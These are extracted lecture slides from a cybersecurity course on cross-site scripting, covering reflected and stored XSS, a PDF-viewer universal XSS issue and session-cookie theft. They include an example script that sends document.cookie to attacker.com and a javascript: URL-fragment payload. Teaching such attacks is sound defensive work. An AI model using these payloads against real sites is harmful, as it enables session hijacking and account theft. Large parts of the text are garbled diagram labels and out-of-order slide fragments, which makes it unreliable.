Professional Documents
Culture Documents
3
Victim client click
4 on li
e ch o nk
user
inpu
t Victim Server
Pre-setup by attacker
bad link
ser gets
u
www.attacker.com
http://victim.com/search.php ?
term = <script> ... </script>
user
cl i ck s
Victim client on l
v i ct i ink
me
cho
es u
ser
inpu Victim Server
t
www.victim.com
<html>
Results for
<script>
window.open(http://attacker.com?
... document.cookie ...)
</script>
</html>
What is XSS?
• An XSS vulnerability is present when an attacker can
inject scripting code into pages generated by a web
application
• Methods for injecting malicious code:
– Reflected XSS (“type 1”)
• the attack script is reflected back to the user as part of a page
from the victim site
– Stored XSS (“type 2”)
• the attacker stores the malicious code in a resource managed by
the web application, such as a database
– Others, such as DOM-based attacks
Source: http://www.acunetix.com/news/paypal.htm
CS4293 Topics on Cybersecurity 10
Adobe PDF viewer “feature”
(version <= 7.9)
http://jeremiahgrossman.blogspot.com/2007/01/what-you-need-to-know-about-uxss-in.html
CS4293 Topics on Cybersecurity 11
Here’s how the attack works:
• Attacker locates a PDF file hosted on website.com
• Attacker creates a URL pointing to the PDF, with JavaScript
Malware in the fragment portion
http://website.com/path/to/file.pdf#s=javascript:alert(”xss”);)
=attracts
• Attacker entices a victim to click on the link
• If the victim has Adobe Acrobat Reader Plugin 7.0.x or less,
confirmed in Firefox and Internet Explorer, the JavaScript
Malware executes
ab le data
se nd valu
5
3
User Victim click
4 on li
e ch o nk Send bad stuff
user
inpu
t Server Victim
Reflect it back
data
al valuable
e
4 st
1
Inject malicious
script
2 requ
User Victim e
st co Store bad stuff
3 re nten
ce iv t
e ma
licio Server Victim
Download it us sc
ript
User data
User-
supplied
application
3
User Victim click
4 on li
e ch o nk
user
inpu
t Server Victim
Example Application
• Consider a social networking site, GraceBook,
that allows users to ‘share’ happenings from
around the web. Users can click the “Share with
GraceBook” button which publishes content to
GraceBook.
o o kie : a u th e nticator
Set-c
GET…
Cookie: au
th enticator
response
Solution:
So always log out of web sites at the conclusion of your session!
Legitimate Case